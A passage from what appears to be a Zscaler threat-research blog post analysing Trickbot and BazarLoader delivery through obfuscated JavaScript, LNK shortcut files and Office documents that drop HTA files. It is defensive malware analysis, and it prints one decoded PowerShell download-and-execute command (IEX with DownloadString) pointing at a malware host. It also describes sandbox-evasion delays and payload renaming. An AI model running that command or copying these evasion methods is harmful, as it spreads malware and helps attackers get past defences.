Security Insights

New Trickbot and BazarLoader campaigns use multiple delivery vectors

New Trickbot and BazarLoader campaigns use multiple delivery vectors

The  Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one of the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a large number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying information (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are particularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over computers entirely.

ThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The malware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post, we will show analysis of the different delivery vectors used by Trickbot and BazarLoader.

Key Points:

1. Script and LNK files added evasion techniques to leverage Malware threats.

2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.

3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.

4. Newly registered domains are used to deliver threats.

Trickbot is expanding its range of file types for malware delivery

In previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the last month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats, as shown in the following charts:

 Overall Trickbot blocked in the sandbox

Fig1:Trickbot blocked in the Zscaler Cloud Sandbox

Bazar overall blocked in the sandbox

Fig2:BazarLoader blocked in the Zscaler Cloud Sandbox

In this blog, we’ll walk through the attack chain for multiple delivery vectors, including: 

  • Trickbot spreading through scripting files
  • Trickbot spreading through LNK files
  • BazarLoader spreading through Office attachments

Trickbot spreading through scripting files

Trickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:  


Fig3:Spam email attachment

In this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly used to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:

First obfuscated layer

Fig4:First layer of obfuscation in javascript

In addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large amounts of junk code to the end to make debugging more difficult. The junk code is just random generated obfuscated strings that do not play any role with the malicious code.

Junk code to make analysis difficult

Fig5:Junk code to make analysis difficult

Using the eval() function we have de-obfuscated the second layer in which malicious code is embedded with more junk code. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can see that the Trickbot authors used the setTimeout() method, which evaluates an expression after a 967 milliseconds to delay execution in the sandbox. This helps the malware evade sandbox environments.

Second layer

Fig6: Second layer of obfuscation in javascript

In the above snapshot we are able to see the replace method implemented in the code where “"hdBDJ" and “tSJVh” strings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the final string.

Final layer

Fig7:Final layer

The malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot as payload. 

Flow of execution: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe embedded with base64 encoded command and after decoded following command is:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

JS Sandbox

Fig8:Zscaler Cloud Sandbox detection of Javascript Downloader

Trickbot spreading through LNK files

Windows LNK (LNK) extensions are usually seen by users as shortcuts, and we have frequently observed cybercriminals using LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the properties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make it more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using malicious Office attachments in 2018.

Final LNK

Fig9:Code embedded in the properties section of LNK

Downloading Trickbot :

  1. LNK downloads the file from using a silent argument so that the user is not able to see any error message or progress action.
  2. After downloading, the malware saves the file to the Temp folder with the name application1_form.pdf.
  3. Finally, the file is renamed from application1_form.pdf to support.exe and executed. Here, support.exe is Trickbot.

Lnk Sandbox

Fig10:Zscaler Cloud Sandbox detection of LNK Downloader

BazarLoader spreading through Office attachments

This is one of the other techniques used in TA551 APT aka Shathak. Malicious office documents drop the HTA file to “C\ProgramData\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a vulnerable Windows host with BazarLoader. 

Once macro-enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering BazarLoader and Trickbot in the past.

Fig11:Attack chain of DOC file to download BazarLoader

Base64 encoded data is implemented in the HTML <div> tag which is used later with javascript.


Fig12:Dropped HTA file : Malicious base64 encoded under HTML <div> section

Below is the snapshot of decode base64 data in which we can see it downloading the payload and saving as friendIFriend,jpg to the victim machine:

Decoded HTA

Fig13:Dropped HTA file : Decode Base64 data

Networking : C&C to download BazarLoader


Fig14:Sending request to download BazarLoader

We have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer delivered through spam email and bundled with a malicious Microsoft Office attachment.


Fig15: Newly registered domain

DOC Sandbox

Fig16:Zscaler Cloud Sandbox detection of Malicious Office file Downloader







Gather Victim Network Information


Drive-by Compromise


System Information Discovery


Deobfuscate/Decode Files or Information


Hide Artifacts


Obfuscated Files or Information


Indicators of Compromise
























Subcontractor Reviews (Sep 2021).lnk













Associated URLs:








Get the latest Zscaler blog updates in your inbox

Subscription confirmed. More of the latest from Zscaler, coming your way soon!

By submitting the form, you are agreeing to our privacy policy.